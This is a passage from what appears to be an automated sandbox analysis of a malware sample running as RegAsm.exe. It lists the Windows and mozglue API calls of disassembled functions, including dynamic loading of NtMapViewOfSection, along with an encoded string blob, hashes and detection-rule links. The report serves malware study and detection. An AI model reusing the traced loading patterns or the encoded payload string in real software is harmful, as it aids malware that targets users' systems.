                                                                                                                                                                                                                                                      • Part of subcall function 6C6D31C0: __Init_thread_footer.LIBCMT ref: 6C6D3260
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C6D327F
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6D328E
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6D32AB
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6D32D1
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6D32E5
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6D32F7
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C6E9675
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E9697
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6E96E8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C6E9707
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E971F
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C6E9773
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6E97B7
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C6E97D0
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C6E97EB
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C6E9824
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                                                                                                                                                    • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                    • API String ID: 3361784254-3880535382
                                                                                                                                                                                                                                                    • Opcode ID: 9c371ff2d202802e0e7168949c1775dce8e802cbe610dae17a823f34219c1378
                                                                                                                                                                                                                                                    • Instruction ID: 72acb920f0d3a6d5d810726fc1841f7a023e3b3d5c3d7e03967bc0a169707514
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c371ff2d202802e0e7168949c1775dce8e802cbe610dae17a823f34219c1378
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC61D0B1705205AFDF00DF79D988BDA7BB4EF4A318F90493AE91593780DB30A858CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00412650 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 134stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,block,00000000,?,00417B94), ref: 00412688
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00412693
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 004126AA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                                                    • String ID: block
                                                                                                                                                                                                                                                    • API String ID: 3407564107-2199623458
                                                                                                                                                                                                                                                    • Opcode ID: a0d2cc126ebbe59d68b13d22e930ee4235cfe813d69f01203fe421d8b4086cce
                                                                                                                                                                                                                                                    • Instruction ID: 96f1d251ac3b3f96118afa83a373414c86d14ae6a9d78866f37a6319a8b9cdb7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0d2cc126ebbe59d68b13d22e930ee4235cfe813d69f01203fe421d8b4086cce
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E41B7B1A44312AFE7209FB1DE85BA777A8BF45B44B10052BF412D36D0E7BCA4708729
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6D31C0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 183timelibraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C6D3217
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C6D3236
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C6D324B
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D3260
                                                                                                                                                                                                                                                    • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C6D327F
                                                                                                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6D328E
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6D32AB
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6D32D1
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6D32E5
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6D32F7
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: EnterCriticalSection.KERNEL32(6C75E370,?,?,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284), ref: 6C70AB94
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: LeaveCriticalSection.KERNEL32(6C75E370,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C70ABD1
                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C6D346B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
                                                                                                                                                                                                                                                    • String ID: KernelBase.dll$QueryInterruptTime
                                                                                                                                                                                                                                                    • API String ID: 3006643210-2417823192
                                                                                                                                                                                                                                                    • Opcode ID: 085bb64c36b7fbb9a0ef1ec1a67d2abbd11a365f8e9ac107876ca490ce804fca
                                                                                                                                                                                                                                                    • Instruction ID: fcd5ecd462e904fd011c80453fb30cea1be3495c127fea2f405e77f809f24d2f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 085bb64c36b7fbb9a0ef1ec1a67d2abbd11a365f8e9ac107876ca490ce804fca
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31611671A087418BC711CF38C85165AB7F5FFC6354F618B2DF8A5A3690EB30A54ACB46
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C736660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(6C75F618), ref: 6C736694
                                                                                                                                                                                                                                                    • GetThreadId.KERNEL32(?), ref: 6C7366B1
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7366B9
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C7366E1
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75F618), ref: 6C736734
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C73673A
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75F618), ref: 6C73676C
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6C7367FC
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C736868
                                                                                                                                                                                                                                                    • RtlCaptureContext.NTDLL ref: 6C73687F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                                                                                                                                                                                    • String ID: WalkStack64
                                                                                                                                                                                                                                                    • API String ID: 2357170935-3499369396
                                                                                                                                                                                                                                                    • Opcode ID: 4fdc189a5074fb80ea9d89e95870ddfeaec11be689ec0ae387d48bd1aba9bd7d
                                                                                                                                                                                                                                                    • Instruction ID: 70565c4ca3e46dddb33600cc37a569cf5a7f8396f99df0999a1f42f7d0d84383
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4fdc189a5074fb80ea9d89e95870ddfeaec11be689ec0ae387d48bd1aba9bd7d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5851C171A09310AFD711CF24CA48B5ABBF4FF89714F44892DF99887641DB70EA18CB92
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6D4480 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 316COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • IRhnHTXxRuEexdud9PtLYk76/Wl4J/395cX7ybtoWbju6lkZAWlHY33yesnKq4dynLS4vzTHinJWtO2Z/f13fPmHHnlzRPhahAyV5SZ2yVm1LNcX2HbKjKY2VGijI70WSsybgTtP70XEztN7iuDO0/vJiHvK4Cwzw4otWO67vxQlJ8oyPgalvCiPVat4G4Qdj5xR9fYlZUGurlZ7TzWPVepo/TnH8nFJpzvHTkDKOrvBKSFIqtx5tAD07DxaEMHcebSA, xrefs: 6C6D45B2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$moz_xmalloc
                                                                                                                                                                                                                                                    • String ID: IRhnHTXxRuEexdud9PtLYk76/Wl4J/395cX7ybtoWbju6lkZAWlHY33yesnKq4dynLS4vzTHinJWtO2Z/f13fPmHHnlzRPhahAyV5SZ2yVm1LNcX2HbKjKY2VGijI70WSsybgTtP70XEztN7iuDO0/vJiHvK4Cwzw4otWO67vxQlJ8oyPgalvCiPVat4G4Qdj5xR9fYlZUGurlZ7TzWPVepo/TnH8nFJpzvHTkDKOrvBKSFIqtx5tAD07DxaEMHcebSA
                                                                                                                                                                                                                                                    • API String ID: 3009372454-3481030271
                                                                                                                                                                                                                                                    • Opcode ID: 2ad7733eb1c942e110d62b5c6a2653b2a2280db973a63aebe3f208b693cea7c6
                                                                                                                                                                                                                                                    • Instruction ID: 24b88d1e509ccbd2aeace68e21c0938bee48a708d97972dbb779ec4affc62470
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ad7733eb1c942e110d62b5c6a2653b2a2280db973a63aebe3f208b693cea7c6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09B1E671A041508FDB188F3CD8D07BD76A2AF46318F1A4669E416DBB96D7B1EC808B49
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C72D840 Relevance: 21.2, APIs: 14, Instructions: 206threadtimeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72D85F
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C72D86C
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72D918
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72D93C
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C72D948
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72D970
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72D976
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C72D982
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72D9CF
                                                                                                                                                                                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C72DA2E
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72DA6F
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C72DA78
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C72DA91
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5C50: GetTickCount64.KERNEL32 ref: 6C6F5D40
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5C50: EnterCriticalSection.KERNEL32(6C75F688), ref: 6C6F5D67
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72DAB7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1195625958-0
                                                                                                                                                                                                                                                    • Opcode ID: c6e8021c2f7ac0d8ae9965d22c88af9a7e423ec80b4e08058af4ca89dee66400
                                                                                                                                                                                                                                                    • Instruction ID: 885f503b550baaa926592774f78e392e790ab9022b8a911aaba9423d0e5cf4c6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6e8021c2f7ac0d8ae9965d22c88af9a7e423ec80b4e08058af4ca89dee66400
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F71AD756043049FCB00CF29C888BAABBF5FF89314F59857EE85A9B341DB34A944CB95
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E5E60 Relevance: 21.2, APIs: 14, Instructions: 182threadstringtimeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E5E9D
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6F56EE,?,00000001), ref: 6C6F5B85
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: EnterCriticalSection.KERNEL32(6C75F688,?,?,?,6C6F56EE,?,00000001), ref: 6C6F5B90
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: LeaveCriticalSection.KERNEL32(6C75F688,?,?,?,6C6F56EE,?,00000001), ref: 6C6F5BD8
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: GetTickCount64.KERNEL32 ref: 6C6F5BE4
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C6E5EAB
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C6E5EB8
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E5ECF
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6E6017
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D4310: moz_xmalloc.MOZGLUE(00000010,?,6C6D42D2), ref: 6C6D436A
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D4310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C6D42D2), ref: 6C6D4387
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000004), ref: 6C6E5F47
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C6E5F53
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6C6E5F5C
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C6E5F66
                                                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C6E5F7E
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000024), ref: 6C6E5F27
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: mozalloc_abort.MOZGLUE(?), ref: 6C6ECAA2
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C71F968), ref: 6C6E5E8C
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C71F968), ref: 6C6E605D
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C71F968), ref: 6C6E60CC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3711609982-0
                                                                                                                                                                                                                                                    • Opcode ID: a3b722b63b36b6ea120fa0ee5a94e19e34cf5464b26e791d8fc1c9f8653db5e7
                                                                                                                                                                                                                                                    • Instruction ID: ec4ef041da221c556b86672eedc2547e9e0de6f6be452e91de4c01f6d0b66c69
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3b722b63b36b6ea120fa0ee5a94e19e34cf5464b26e791d8fc1c9f8653db5e7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 257128B0A09740DFD700DF28C584A6ABBF0FF5A304F54492EE59687B52DB30E948CB56
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C72D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72D4F0
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C72D4FC
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72D52A
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72D530
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C72D53F
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72D55F
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C72D585
                                                                                                                                                                                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C72D5D3
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72D5F9
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C72D605
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72D652
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72D658
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C72D667
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72D6A2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2206442479-0
                                                                                                                                                                                                                                                    • Opcode ID: f66e8e43422d18fe3a117da9e5f430d89716dad4591347fddec0696c71f99599
                                                                                                                                                                                                                                                    • Instruction ID: c53629c4cbb66a4a7b709bca943321428b5b994448550b7731c4d1d44bdc82cc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f66e8e43422d18fe3a117da9e5f430d89716dad4591347fddec0696c71f99599
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91516971A047059FC704CF35C488AAABBF4FF89358F508A2EE85A87710DB34B945CB95
                                                                                                                                                                                                                                                    Uniqueness

